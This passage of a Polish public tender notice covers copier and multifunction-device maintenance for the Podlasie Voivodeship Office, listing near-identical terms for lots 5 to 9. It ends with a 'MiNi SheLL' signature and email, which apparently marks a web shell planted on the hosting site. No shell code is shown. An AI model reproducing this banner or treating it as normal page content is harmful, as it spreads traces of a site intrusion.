5.	Wykonawca zobowiązuje się do konserwacji i naprawy urządzeń materiałami własnymi z zachowaniem przepisów bhp i ppoż.
6. 	Do obowiązków Wykonawcy należy także bezpłatne wykonywanie na zlecenie Zamawiającego pisemnych ekspertyz technicznych urządzeń objętych umową. 
7.	Naprawa powinna być zakończona w ciągu 3 dni roboczych od momentu zgłoszenia faksem przez Zamawiającego awarii z wyłączeniem dni świątecznych i wolnych od pracy. W przypadku niemożności naprawy urządzenia w tym okresie Wykonawca ma obowiązek dostarczyć Zamawiającemu na czas naprawy urządzenie zastępcze o zbliżonych parametrach użytkowych. W przypadku konieczności dokonania naprawy warsztatowej transport urządzenia nastąpi na koszt Wykonawcy. Naprawa urządzenia powinna być poprzedzona ekspertyzą, o której mowa w ust. 6 i wyceną kosztów naprawy.
8.	W przypadku wadliwego działania sprzętu po naprawie, Wykonawca zobowiązany jest do natychmiastowej naprawy w czasie nie dłuższym niż 24 godziny z wyłączeniem dni świątecznych i wolnych od pracy, lub wydania urządzenia zastępczego o zbliżonych parametrach użytkowych na czas trwania naprawy.
9.	Naprawy i odbiór części eksploatacyjnych dokonywane będą w siedzibie Zamawiającego, w miejscu eksploatacji urządzenia.
10.	Wykonawca udzieli gwarancji jakości na wykonane usługi naprawy na okres 12 miesięcy od  dnia ich wykonania.
11.	Szczegółowy wykaz urządzeń objętych zamówieniem wraz z ich lokalizacją zawarty jest w załączniku nr 4 do SIWZ.
12. Zamawiający dopuszcza możliwość składania ofert częściowych. Oferta musi obejmować co najmniej jedno zadanie. Nie dopuszcza się dzielenia zadań..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4, 50.31.31.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5- konserwacja i naprawa kserokopiarek PANASONIC..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi konserwacji i naprawy kserokopiarek i urządzeń wielofunkcyjnych na potrzeby Podlaskiego Urzędu Wojewódzkiego w Białymstoku i placówkach zamiejscowych w Łomży i w Suwałkach zwanych dalej urządzeniami:Zadanie 5- konserwacja i naprawa kserokopiarek PANASONIC.
2.	Miejscem realizacji przedmiotu umowy są obiekty Podlaskiego Urzędu Wojewódzkiego w Białymstoku położone przy ulicy: Mickiewicza 3, Mickiewicza 9, Bema 4, Placówka Zamiejscowa w Łomży ul. Nowa 2, Placówka Zamiejscowa w Suwałkach ul. Sejneńska 13 - zgodnie z załącznikiem nr 4. Konserwacja i naprawa urządzeń w placówce zamiejscowej w Suwałkach będzie odbywać się do dnia 30 czerwca 2009 r.
3.	Wykonawca zobowiązany jest zapoznać się ze stanem technicznym urządzeń, a następnie wykonywać ich konserwacje z taką częstotliwością, która zapewni sprawne funkcjonowanie urządzeń, nie rzadziej jednak niż raz na 3 miesiące, wykonywane zgodnie z wytycznymi producenta.
4.	W zakres prac konserwacyjnych urządzeń wchodzą w szczególności następujące czynności:
1)	ocena stanu technicznego; 
2)	konserwacja mająca na celu zabezpieczenie bezawaryjnej pracy urządzeń;
3)	diagnostyka awarii.
5.	Wykonawca zobowiązuje się do konserwacji i naprawy urządzeń materiałami własnymi z zachowaniem przepisów bhp i ppoż.
6. 	Do obowiązków Wykonawcy należy także bezpłatne wykonywanie na zlecenie Zamawiającego pisemnych ekspertyz technicznych urządzeń objętych umową. 
7.	Naprawa powinna być zakończona w ciągu 3 dni roboczych od momentu zgłoszenia faksem przez Zamawiającego awarii z wyłączeniem dni świątecznych i wolnych od pracy. W przypadku niemożności naprawy urządzenia w tym okresie Wykonawca ma obowiązek dostarczyć Zamawiającemu na czas naprawy urządzenie zastępcze o zbliżonych parametrach użytkowych. W przypadku konieczności dokonania naprawy warsztatowej transport urządzenia nastąpi na koszt Wykonawcy. Naprawa urządzenia powinna być poprzedzona ekspertyzą, o której mowa w ust. 6 i wyceną kosztów naprawy.
8.	W przypadku wadliwego działania sprzętu po naprawie, Wykonawca zobowiązany jest do natychmiastowej naprawy w czasie nie dłuższym niż 24 godziny z wyłączeniem dni świątecznych i wolnych od pracy, lub wydania urządzenia zastępczego o zbliżonych parametrach użytkowych na czas trwania naprawy.
9.	Naprawy i odbiór części eksploatacyjnych dokonywane będą w siedzibie Zamawiającego, w miejscu eksploatacji urządzenia.
10.	Wykonawca udzieli gwarancji jakości na wykonane usługi naprawy na okres 12 miesięcy od  dnia ich wykonania.
11.	Szczegółowy wykaz urządzeń objętych zamówieniem wraz z ich lokalizacją zawarty jest w załączniku nr 4 do SIWZ.
12. Zamawiający dopuszcza możliwość składania ofert częściowych. Oferta musi obejmować co najmniej jedno zadanie. Nie dopuszcza się dzielenia zadań..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4, 50.31.31.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6- konserwacja i naprawa kserokopiarek MITA..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi konserwacji i naprawy kserokopiarek i urządzeń wielofunkcyjnych na potrzeby Podlaskiego Urzędu Wojewódzkiego w Białymstoku i placówkach zamiejscowych w Łomży i w Suwałkach zwanych dalej urządzeniami : Zadanie 6- konserwacja i naprawa kserokopiarek MITA.
2.	Miejscem realizacji przedmiotu umowy są obiekty Podlaskiego Urzędu Wojewódzkiego w Białymstoku położone przy ulicy: Mickiewicza 3, Mickiewicza 9, Bema 4, Placówka Zamiejscowa w Łomży ul. Nowa 2, Placówka Zamiejscowa w Suwałkach ul. Sejneńska 13 - zgodnie z załącznikiem nr 4. Konserwacja i naprawa urządzeń w placówce zamiejscowej w Suwałkach będzie odbywać się do dnia 30 czerwca 2009 r.
3.	Wykonawca zobowiązany jest zapoznać się ze stanem technicznym urządzeń, a następnie wykonywać ich konserwacje z taką częstotliwością, która zapewni sprawne funkcjonowanie urządzeń, nie rzadziej jednak niż raz na 3 miesiące, wykonywane zgodnie z wytycznymi producenta.
4.	W zakres prac konserwacyjnych urządzeń wchodzą w szczególności następujące czynności:
1)	ocena stanu technicznego; 
2)	konserwacja mająca na celu zabezpieczenie bezawaryjnej pracy urządzeń;
3)	diagnostyka awarii.
5.	Wykonawca zobowiązuje się do konserwacji i naprawy urządzeń materiałami własnymi z zachowaniem przepisów bhp i ppoż.
6. 	Do obowiązków Wykonawcy należy także bezpłatne wykonywanie na zlecenie Zamawiającego pisemnych ekspertyz technicznych urządzeń objętych umową. 
7.	Naprawa powinna być zakończona w ciągu 3 dni roboczych od momentu zgłoszenia faksem przez Zamawiającego awarii z wyłączeniem dni świątecznych i wolnych od pracy. W przypadku niemożności naprawy urządzenia w tym okresie Wykonawca ma obowiązek dostarczyć Zamawiającemu na czas naprawy urządzenie zastępcze o zbliżonych parametrach użytkowych. W przypadku konieczności dokonania naprawy warsztatowej transport urządzenia nastąpi na koszt Wykonawcy. Naprawa urządzenia powinna być poprzedzona ekspertyzą, o której mowa w ust. 6 i wyceną kosztów naprawy.
8.	W przypadku wadliwego działania sprzętu po naprawie, Wykonawca zobowiązany jest do natychmiastowej naprawy w czasie nie dłuższym niż 24 godziny z wyłączeniem dni świątecznych i wolnych od pracy, lub wydania urządzenia zastępczego o zbliżonych parametrach użytkowych na czas trwania naprawy.
9.	Naprawy i odbiór części eksploatacyjnych dokonywane będą w siedzibie Zamawiającego, w miejscu eksploatacji urządzenia.
10.	Wykonawca udzieli gwarancji jakości na wykonane usługi naprawy na okres 12 miesięcy od  dnia ich wykonania.
11.	Szczegółowy wykaz urządzeń objętych zamówieniem wraz z ich lokalizacją zawarty jest w załączniku nr 4 do SIWZ.
12. Zamawiający dopuszcza możliwość składania ofert częściowych. Oferta musi obejmować co najmniej jedno zadanie. Nie dopuszcza się dzielenia zadań..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4, 50.31.31.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7- konserwacja i naprawa kserokopiarek NASHUATEC..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi konserwacji i naprawy kserokopiarek i urządzeń wielofunkcyjnych na potrzeby Podlaskiego Urzędu Wojewódzkiego w Białymstoku i placówkach zamiejscowych w Łomży i w Suwałkach zwanych dalej urządzeniami: Zadanie 7- konserwacja i naprawa kserokopiarek NASHUATEC.
2.	Miejscem realizacji przedmiotu umowy są obiekty Podlaskiego Urzędu Wojewódzkiego w Białymstoku położone przy ulicy: Mickiewicza 3, Mickiewicza 9, Bema 4, Placówka Zamiejscowa w Łomży ul. Nowa 2, Placówka Zamiejscowa w Suwałkach ul. Sejneńska 13 - zgodnie z załącznikiem nr 4. Konserwacja i naprawa urządzeń w placówce zamiejscowej w Suwałkach będzie odbywać się do dnia 30 czerwca 2009 r.
3.	Wykonawca zobowiązany jest zapoznać się ze stanem technicznym urządzeń, a następnie wykonywać ich konserwacje z taką częstotliwością, która zapewni sprawne funkcjonowanie urządzeń, nie rzadziej jednak niż raz na 3 miesiące, wykonywane zgodnie z wytycznymi producenta.
4.	W zakres prac konserwacyjnych urządzeń wchodzą w szczególności następujące czynności:
1)	ocena stanu technicznego; 
2)	konserwacja mająca na celu zabezpieczenie bezawaryjnej pracy urządzeń;
3)	diagnostyka awarii.
5.	Wykonawca zobowiązuje się do konserwacji i naprawy urządzeń materiałami własnymi z zachowaniem przepisów bhp i ppoż.
6. 	Do obowiązków Wykonawcy należy także bezpłatne wykonywanie na zlecenie Zamawiającego pisemnych ekspertyz technicznych urządzeń objętych umową. 
7.	Naprawa powinna być zakończona w ciągu 3 dni roboczych od momentu zgłoszenia faksem przez Zamawiającego awarii z wyłączeniem dni świątecznych i wolnych od pracy. W przypadku niemożności naprawy urządzenia w tym okresie Wykonawca ma obowiązek dostarczyć Zamawiającemu na czas naprawy urządzenie zastępcze o zbliżonych parametrach użytkowych. W przypadku konieczności dokonania naprawy warsztatowej transport urządzenia nastąpi na koszt Wykonawcy. Naprawa urządzenia powinna być poprzedzona ekspertyzą, o której mowa w ust. 6 i wyceną kosztów naprawy.
8.	W przypadku wadliwego działania sprzętu po naprawie, Wykonawca zobowiązany jest do natychmiastowej naprawy w czasie nie dłuższym niż 24 godziny z wyłączeniem dni świątecznych i wolnych od pracy, lub wydania urządzenia zastępczego o zbliżonych parametrach użytkowych na czas trwania naprawy.
9.	Naprawy i odbiór części eksploatacyjnych dokonywane będą w siedzibie Zamawiającego, w miejscu eksploatacji urządzenia.
10.	Wykonawca udzieli gwarancji jakości na wykonane usługi naprawy na okres 12 miesięcy od  dnia ich wykonania.
11.	Szczegółowy wykaz urządzeń objętych zamówieniem wraz z ich lokalizacją zawarty jest w załączniku nr 4 do SIWZ.
12. Zamawiający dopuszcza możliwość składania ofert częściowych. Oferta musi obejmować co najmniej jedno zadanie. Nie dopuszcza się dzielenia zadań..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4, 50.31.31.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8- konserwacja i naprawa kserokopiarek KONICA..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi konserwacji i naprawy kserokopiarek i urządzeń wielofunkcyjnych na potrzeby Podlaskiego Urzędu Wojewódzkiego w Białymstoku i placówkach zamiejscowych w Łomży i w Suwałkach zwanych dalej urządzeniami: Zadanie 8- konserwacja i naprawa kserokopiarek KONICA.
2.	Miejscem realizacji przedmiotu umowy są obiekty Podlaskiego Urzędu Wojewódzkiego w Białymstoku położone przy ulicy: Mickiewicza 3, Mickiewicza 9, Bema 4, Placówka Zamiejscowa w Łomży ul. Nowa 2, Placówka Zamiejscowa w Suwałkach ul. Sejneńska 13 - zgodnie z załącznikiem nr 4. Konserwacja i naprawa urządzeń w placówce zamiejscowej w Suwałkach będzie odbywać się do dnia 30 czerwca 2009 r.
3.	Wykonawca zobowiązany jest zapoznać się ze stanem technicznym urządzeń, a następnie wykonywać ich konserwacje z taką częstotliwością, która zapewni sprawne funkcjonowanie urządzeń, nie rzadziej jednak niż raz na 3 miesiące, wykonywane zgodnie z wytycznymi producenta.
4.	W zakres prac konserwacyjnych urządzeń wchodzą w szczególności następujące czynności:
1)	ocena stanu technicznego; 
2)	konserwacja mająca na celu zabezpieczenie bezawaryjnej pracy urządzeń;
3)	diagnostyka awarii.
5.	Wykonawca zobowiązuje się do konserwacji i naprawy urządzeń materiałami własnymi z zachowaniem przepisów bhp i ppoż.
6. 	Do obowiązków Wykonawcy należy także bezpłatne wykonywanie na zlecenie Zamawiającego pisemnych ekspertyz technicznych urządzeń objętych umową. 
7.	Naprawa powinna być zakończona w ciągu 3 dni roboczych od momentu zgłoszenia faksem przez Zamawiającego awarii z wyłączeniem dni świątecznych i wolnych od pracy. W przypadku niemożności naprawy urządzenia w tym okresie Wykonawca ma obowiązek dostarczyć Zamawiającemu na czas naprawy urządzenie zastępcze o zbliżonych parametrach użytkowych. W przypadku konieczności dokonania naprawy warsztatowej transport urządzenia nastąpi na koszt Wykonawcy. Naprawa urządzenia powinna być poprzedzona ekspertyzą, o której mowa w ust. 6 i wyceną kosztów naprawy.
8.	W przypadku wadliwego działania sprzętu po naprawie, Wykonawca zobowiązany jest do natychmiastowej naprawy w czasie nie dłuższym niż 24 godziny z wyłączeniem dni świątecznych i wolnych od pracy, lub wydania urządzenia zastępczego o zbliżonych parametrach użytkowych na czas trwania naprawy.
9.	Naprawy i odbiór części eksploatacyjnych dokonywane będą w siedzibie Zamawiającego, w miejscu eksploatacji urządzenia.
10.	Wykonawca udzieli gwarancji jakości na wykonane usługi naprawy na okres 12 miesięcy od  dnia ich wykonania.
11.	Szczegółowy wykaz urządzeń objętych zamówieniem wraz z ich lokalizacją zawarty jest w załączniku nr 4 do SIWZ.
12. Zamawiający dopuszcza możliwość składania ofert częściowych. Oferta musi obejmować co najmniej jedno zadanie. Nie dopuszcza się dzielenia zadań..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4, 50.31.31.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9- konserwacja i naprawa urządzeń wielofunkcyjnych..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi konserwacji i naprawy kserokopiarek i urządzeń wielofunkcyjnych na potrzeby Podlaskiego Urzędu Wojewódzkiego w Białymstoku i placówkach zamiejscowych w Łomży i w Suwałkach zwanych dalej urządzeniami: Zadanie 9- konserwacja i naprawa urządzeń wielofunkcyjnych.
2.	Miejscem realizacji przedmiotu umowy są obiekty Podlaskiego Urzędu Wojewódzkiego w Białymstoku położone przy ulicy: Mickiewicza 3, Mickiewicza 9, Bema 4, Placówka Zamiejscowa w Łomży ul. Nowa 2, Placówka Zamiejscowa w Suwałkach ul. Sejneńska 13 - zgodnie z załącznikiem nr 4. Konserwacja i naprawa urządzeń w placówce zamiejscowej w Suwałkach będzie odbywać się do dnia 30 czerwca 2009 r.
3.	Wykonawca zobowiązany jest zapoznać się ze stanem technicznym urządzeń, a następnie wykonywać ich konserwacje z taką częstotliwością, która zapewni sprawne funkcjonowanie urządzeń, nie rzadziej jednak niż raz na 3 miesiące, wykonywane zgodnie z wytycznymi producenta.
4.	W zakres prac konserwacyjnych urządzeń wchodzą w szczególności następujące czynności:
1)	ocena stanu technicznego; 
2)	konserwacja mająca na celu zabezpieczenie bezawaryjnej pracy urządzeń;
3)	diagnostyka awarii.
5.	Wykonawca zobowiązuje się do konserwacji i naprawy urządzeń materiałami własnymi z zachowaniem przepisów bhp i ppoż.
6. 	Do obowiązków Wykonawcy należy także bezpłatne wykonywanie na zlecenie Zamawiającego pisemnych ekspertyz technicznych urządzeń objętych umową. 
7.	Naprawa powinna być zakończona w ciągu 3 dni roboczych od momentu zgłoszenia faksem przez Zamawiającego awarii z wyłączeniem dni świątecznych i wolnych od pracy. W przypadku niemożności naprawy urządzenia w tym okresie Wykonawca ma obowiązek dostarczyć Zamawiającemu na czas naprawy urządzenie zastępcze o zbliżonych parametrach użytkowych. W przypadku konieczności dokonania naprawy warsztatowej transport urządzenia nastąpi na koszt Wykonawcy. Naprawa urządzenia powinna być poprzedzona ekspertyzą, o której mowa w ust. 6 i wyceną kosztów naprawy.
8.	W przypadku wadliwego działania sprzętu po naprawie, Wykonawca zobowiązany jest do natychmiastowej naprawy w czasie nie dłuższym niż 24 godziny z wyłączeniem dni świątecznych i wolnych od pracy, lub wydania urządzenia zastępczego o zbliżonych parametrach użytkowych na czas trwania naprawy.
9.	Naprawy i odbiór części eksploatacyjnych dokonywane będą w siedzibie Zamawiającego, w miejscu eksploatacji urządzenia.
10.	Wykonawca udzieli gwarancji jakości na wykonane usługi naprawy na okres 12 miesięcy od  dnia ich wykonania.
11.	Szczegółowy wykaz urządzeń objętych zamówieniem wraz z ich lokalizacją zawarty jest w załączniku nr 4 do SIWZ.
12. Zamawiający dopuszcza możliwość składania ofert częściowych. Oferta musi obejmować co najmniej jedno zadanie. Nie dopuszcza się dzielenia zadań..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4, 50.31.31.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com